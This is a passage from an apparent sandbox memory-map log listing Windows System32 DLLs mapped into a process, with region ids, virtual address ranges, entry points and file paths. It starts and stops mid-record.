entry_point = 0x7ffd9f2a9020 region_type = mapped_file name = "devicemetadataretrievalclient.dll" filename = "\\Windows\\System32\\DeviceMetadataRetrievalClient.dll" (normalized: "c:\\windows\\system32\\devicemetadataretrievalclient.dll") Region: id = 2605 start_va = 0x7ffd9f4c0000 end_va = 0x7ffd9f4d0fff monitored = 0 entry_point = 0x7ffd9f4c28d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 2606 start_va = 0x7ffd9f4e0000 end_va = 0x7ffd9f511fff monitored = 0 entry_point = 0x7ffd9f4eb0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2607 start_va = 0x7ffd9f620000 end_va = 0x7ffd9f627fff monitored = 0 entry_point = 0x7ffd9f6213b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 2608 start_va = 0x7ffd9f630000 end_va = 0x7ffd9f646fff monitored = 0 entry_point = 0x7ffd9f637520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 2609 start_va = 0x7ffd9f650000 end_va = 0x7ffd9f667fff monitored = 0 entry_point = 0x7ffd9f65b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 2610 start_va = 0x7ffd9f670000 end_va = 0x7ffd9f77efff monitored = 0 entry_point = 0x7ffd9f6ac010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 2611 start_va = 0x7ffd9f780000 end_va = 0x7ffd9f7e6fff monitored = 0 entry_point = 0x7ffd9f78b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 2612 start_va = 0x7ffd9f7f0000 end_va = 0x7ffd9f803fff monitored = 0 entry_point = 0x7ffd9f7f2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 2613 start_va = 0x7ffd9fa50000 end_va = 0x7ffd9fa6cfff monitored = 0 entry_point = 0x7ffd9fa54f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 2614 start_va = 0x7ffda0000000 end_va = 0x7ffda011cfff monitored = 0 entry_point = 0x7ffda002fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 2615 start_va = 0x7ffda0120000 end_va = 0x7ffda012cfff monitored = 0 entry_point = 0x7ffda0125020 region_type = mapped_file name = "devicedriverretrievalclient.dll" filename = "\\Windows\\System32\\DeviceDriverRetrievalClient.dll" (normalized: "c:\\windows\\system32\\devicedriverretrievalclient.dll") Region: id = 2616 start_va = 0x7ffda0130000 end_va = 0x7ffda0153fff monitored = 0 entry_point = 0x7ffda0146390 region_type = mapped_file name = "devpropmgr.dll" filename = "\\Windows\\System32\\DevPropMgr.dll" (normalized: "c:\\windows\\system32\\devpropmgr.dll") Region: id = 2617 start_va = 0x7ffda0160000 end_va = 0x7ffda01f9fff monitored = 0 entry_point = 0x7ffda017ada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2618 start_va = 0x7ffda0260000 end_va = 0x7ffda027efff monitored = 0 entry_point = 0x7ffda0264960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 2619 start_va = 0x7ffda02f0000 end_va = 0x7ffda02fdfff monitored = 0 entry_point = 0x7ffda02f1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2620 start_va = 0x7ffda0310000 end_va = 0x7ffda0376fff monitored = 0 entry_point = 0x7ffda03163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2621 start_va = 0x7ffda0530000 end_va = 0x7ffda05effff monitored = 0 entry_point = 0x7ffda055fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2622 start_va = 0x7ffda07a0000 end_va = 0x7ffda084dfff monitored = 0 entry_point = 0x7ffda07b80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 2623 start_va = 0x7ffda0850000 end_va = 0x7ffda0861fff monitored = 0 entry_point = 0x7ffda0859260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 2624 start_va = 0x7ffda0870000 end_va = 0x7ffda0920fff monitored = 0 entry_point = 0x7ffda08e88b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 2625 start_va = 0x7ffda0930000 end_va = 0x7ffda0954fff monitored = 0 entry_point = 0x7ffda0942f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 2626 start_va = 0x7ffda0960000 end_va = 0x7ffda0970fff monitored = 0 entry_point = 0x7ffda0967ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 2627 start_va = 0x7ffda0980000 end_va = 0x7ffda0999fff monitored = 0 entry_point = 0x7ffda0982cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 2628 start_va = 0x7ffda09a0000 end_va = 0x7ffda09abfff monitored = 0 entry_point = 0x7ffda09a14d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 2629 start_va = 0x7ffda09b0000 end_va = 0x7ffda09c4fff monitored = 0 entry_point = 0x7ffda09b3460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 2630 start_va = 0x7ffda0aa0000 end_va = 0x7ffda0af4fff monitored = 0 entry_point = 0x7ffda0aa3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2631 start_va = 0x7ffda0b00000 end_va = 0x7ffda0b36fff monitored = 0 entry_point = 0x7ffda0b06020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 2632 start_va = 0x7ffda0b40000 end_va = 0x7ffda0b5ffff monitored = 0 entry_point = 0x7ffda0b439a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 2633 start_va = 0x7ffda0b60000 end_va = 0x7ffda0ba0fff monitored = 0 entry_point = 0x7ffda0b64840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 2634 start_va = 0x7ffda0d10000 end_va = 0x7ffda0d23fff monitored = 0 entry_point = 0x7ffda0d12d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2635 start_va = 0x7ffda0de0000 end_va = 0x7ffda0df7fff monitored = 0 entry_point = 0x7ffda0de1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 2636 start_va = 0x7ffda1010000 end_va = 0x7ffda10a2fff monitored = 0 entry_point = 0x7ffda1019680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2637 start_va = 0x7ffda11c0000 end_va = 0x7ffda11d8fff monitored = 0 entry_point = 0x7ffda11c4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2638 start_va = 0x7ffda1290000 end_va = 0x7ffda1357fff monitored = 0 entry_point = 0x7ffda12d13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2639 start_va = 0x7ffda1360000 end_va = 0x7ffda13c0fff monitored = 0 entry_point = 0x7ffda1364b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2640 start_va = 0x7ffda13d0000 end_va = 0x7ffda154bfff monitored = 0 entry_point = 0x7ffda1421650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 2641 start_va = 0x7ffda1550000 end_va = 0x7ffda155afff monitored = 0 entry_point = 0x7ffda1551770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 2642 start_va = 0x7ffda1560000 end_va = 0x7ffda158dfff monitored = 0 entry_point = 0x7ffda1567550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2643 start_va = 0x7ffda1590000 end_va = 0x7ffda15a6fff monitored = 0 entry_point = 0x7ffda1595630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2644 start_va = 0x7ffda1790000 end_va = 0x7ffda17a9fff monitored = 0 entry_point = 0x7ffda1792430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2645 start_va = 0x7ffda17b0000 end_va = 0x7ffda17c5fff monitored = 0 entry_point = 0x7ffda17b19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2646 start_va = 0x7ffda17d0000 end_va = 0x7ffda1807fff monitored = 0 entry_point = 0x7ffda17e8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2647 start_va = 0x7ffda1810000 end_va = 0x7ffda181afff monitored = 0 entry_point = 0x7ffda1811d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2648 start_va = 0x7ffda1820000 end_va = 0x7ffda182cfff monitored = 0 entry_point = 0x7ffda1822ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 2649 start_va = 0x7ffda1830000 end_va = 0x7ffda185efff monitored = 0 entry_point = 0x7ffda1838910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 2650 start_va = 0x7ffda18b0000 end_va = 0x7ffda18c5fff monitored = 0 entry_point = 0x7ffda18b1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2651 start_va = 0x7ffda1930000 end_va = 0x7ffda1a15fff monitored = 0 entry_point = 0x7ffda194cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 2652 start_va = 0x7ffda1a20000 end_va = 0x7ffda1a99fff monitored = 0 entry_point = 0x7ffda1a47630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2653 start_va = 0x7ffda1cd0000 end_va = 0x7ffda1d3dfff monitored = 0 entry_point = 0x7ffda1cd7f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2654 start_va = 0x7ffda1d80000 end_va = 0x7ffda1e11fff monitored = 0 entry_point = 0x7ffda1dca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2655 start_va = 0x7ffda1ea0000 end_va = 0x7ffda1eb0fff monitored = 0 entry_point = 0x7ffda1ea3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2656 start_va = 0x7ffda22b0000 end_va = 0x7ffda22f0fff monitored = 0 entry_point = 0x7ffda22c7eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2657 start_va = 0x7ffda2300000 end_va = 0x7ffda23fbfff monitored = 0 entry_point = 0x7ffda2336df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2658 start_va = 0x7ffda25e0000 end_va = 0x7ffda2961fff monitored = 0 entry_point = 0x7ffda2631220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2659 start_va = 0x7ffda2970000 end_va = 0x7ffda2aa5fff monitored = 0 entry_point = 0x7ffda299f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2660 start_va = 0x7ffda3ba0000 end_va = 0x7ffda3cadfff monitored = 0 entry_point = 0x7ffda3beeaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 2661 start_va = 0x7ffda3fb0000 end_va = 0x7ffda3fbffff monitored = 0 entry_point = 0x7ffda3fb2c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 2662 start_va = 0x7ffda3fc0000 end_va = 0x7ffda3fd2fff monitored = 0 entry_point = 0x7ffda3fc57f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2663 start_va = 0x7ffda3fe0000 end_va = 0x7ffda401dfff monitored = 0 entry_point = 0x7ffda3fea050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2664 start_va = 0x7ffda4020000 end_va = 0x7ffda4046fff monitored = 0 entry_point = 0x7ffda4023bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 2665 start_va = 0x7ffda4050000 end_va = 0x7ffda405bfff monitored = 0 entry_point = 0x7ffda4052830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 2666 start_va = 0x7ffda4060000 end_va = 0x7ffda40b4fff monitored = 0 entry_point = 0x7ffda406fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2667 start_va = 0x7ffda40c0000 end_va = 0x7ffda4123fff monitored = 0 entry_point = 0x7ffda40d5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2668 start_va = 0x7ffda42f0000 end_va = 0x7ffda43aefff monitored = 0 entry_point = 0x7ffda4311c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2669 start_va = 0x7ffda43b0000 end_va = 0x7ffda43effff monitored = 0 entry_point = 0x7ffda43c6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2670 start_va = 0x7ffda43f0000 end_va = 0x7ffda4418fff monitored = 0 entry_point = 0x7ffda43fca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2671 start_va = 0x7ffda4420000 end_va = 0x7ffda4455fff monitored = 0 entry_point = 0x7ffda4430070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2672 start_va = 0x7ffda4ce0000 end_va = 0x7ffda4ceafff monitored = 0 entry_point = 0x7ffda4ce1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 2673 start_va = 0x7ffda4d20000 end_va = 0x7ffda4d29fff monitored = 0 entry_point = 0x7ffda4d21660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2674 start_va = 0x7ffda4d30000 end_va = 0x7ffda4d47fff monitored = 0 entry_point = 0x7ffda4d35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2675 start_va = 0x7ffda4d50000 end_va = 0x7ffda4e9cfff monitored = 0 entry_point = 0x7ffda4d93da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2676 start_va = 0x7ffda5930000 end_va = 0x7ffda59a8fff monitored = 0 entry_point = 0x7ffda594fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2677 start_va = 0x7ffda5b60000 end_va = 0x7ffda5ff2fff monitored = 0 entry_point = 0x7ffda5b6f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2678 start_va = 0x7ffda6000000 end_va = 0x7ffda6066fff monitored = 0 entry_point = 0x7ffda601e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 2679 start_va = 0x7ffda60c0000 end_va = 0x7ffda60c7fff monitored = 0 entry_point = 0x7ffda60c13e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 2680 start_va = 0x7ffda6100000 end_va = 0x7ffda6285fff monitored = 0 entry_point = 0x7ffda614d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2681 start_va = 0x7ffda6290000 end_va = 0x7ffda62abfff monitored = 0 entry_point = 0x7ffda62937a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2682 start_va = 0x7ffda62f0000 end_va = 0x7ffda6302fff monitored = 0 entry_point = 0x7ffda62f2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2683 start_va = 0x7ffda6460000 end_va = 0x7ffda649ffff monitored = 0 entry_point = 0x7ffda6471960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 2684 start_va = 0x7ffda65d0000 end_va = 0x7ffda65f6fff monitored = 0 entry_point = 0x7ffda65d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2685 start_va = 0x7ffda6620000 end_va = 0x7ffda66c9fff monitored = 0 entry_point = 0x7ffda6647910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2686 start_va = 0x7ffda66d0000 end_va = 0x7ffda67cffff monitored = 0 entry_point = 0x7ffda6710f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 2687 start_va = 0x7ffda6860000 end_va = 0x7ffda686bfff monitored = 0 entry_point = 0x7ffda6862480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2688 start_va = 0x7ffda6a30000 end_va = 0x7ffda6a61fff monitored = 0 entry_point = 0x7ffda6a42340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2689 start_va = 0x7ffda6ba0000 end_va = 0x7ffda6babfff monitored = 0 entry_point = 0x7ffda6ba2790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2690 start_va = 0x7ffda6bb0000 end_va = 0x7ffda6bd3fff monitored = 0 entry_point = 0x7ffda6bb3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2691 start_va = 0x7ffda6d50000 end_va = 0x7ffda6e43fff monitored = 0 entry_point = 0x7ffda6d5a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2692 start_va = 0x7ffda6ea0000 end_va = 0x7ffda6ee8fff monitored = 0 entry_point = 0x7ffda6eaa090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2693 start_va = 0x7ffda6fc0000 end_va = 0x7ffda6fcbfff monitored = 0 entry_point = 0x7ffda6fc27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2694 start_va = 0x7ffda70a0000 end_va = 0x7ffda70d0fff monitored = 0 entry_point = 0x7ffda70a7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2695 start_va = 0x7ffda7100000 end_va = 0x7ffda7179fff monitored = 0 entry_point = 0x7ffda7121a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 2696 start_va = 0x7ffda71c0000 end_va = 0x7ffda71f3fff monitored = 0 entry_point = 0x7ffda71dae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2697 start_va = 0x7ffda7200000 end_va = 0x7ffda7209fff monitored = 0 entry_point = 0x7ffda7201830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2698 start_va = 0x7ffda7310000 end_va = 0x7ffda732efff monitored = 0 entry_point = 0x7ffda7315d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2699 start_va = 0x7ffda7480000 end_va = 0x7ffda74dbfff monitored = 0 entry_point = 0x7ffda7496f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2700 start_va = 0x7ffda7530000 end_va = 0x7ffda7546fff monitored = 0 entry_point = 0x7ffda75379d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2701 start_va = 0x7ffda7650000 end_va = 0x7ffda765afff monitored = 0 entry_point = 0x7ffda76519a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2702 start_va = 0x7ffda7690000 end_va = 0x7ffda76b0fff monitored = 0 entry_point = 0x7ffda76a0250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 2703 start_va = 0x7ffda76e0000 end_va = 0x7ffda7719fff monitored = 0 entry_point = 0x7ffda76e8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2704 start_va = 0x7ffda7720000 end_va = 0x7ffda7746fff monitored = 0 entry_point = 0x7ffda7730aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2705 start_va = 0x7ffda7830000 end_va = 0x7ffda785cfff monitored = 0 entry_point = 0x7ffda7849d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2706 start_va = 0x7ffda79c0000 end_va = 0x7ffda7a15fff monitored = 0 entry_point = 0x7ffda79d0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2707 start_va = 0x7ffda7a20000 end_va = 0x7ffda7a38fff monitored = 0 entry_point = 0x7ffda7a25e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2708 start_va = 0x7ffda7a40000 end_va = 0x7ffda7a68fff monitored = 0 entry_point = 0x7ffda7a54530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2709 start_va = 0x7ffda7a70000 end_va = 0x7ffda7b08fff monitored = 0 entry_point = 0x7ffda7a9f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2710 start_va = 0x7ffda7bb0000 end_va = 0x7ffda7bfafff monitored = 0 entry_point = 0x7ffda7bb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2711 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2712 start_va = 0x7ffda7c10000 end_va = 0x7ffda7c23fff monitored = 0 entry_point = 0x7ffda7c152e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2713 start_va = 0x7ffda7c30000 end_va = 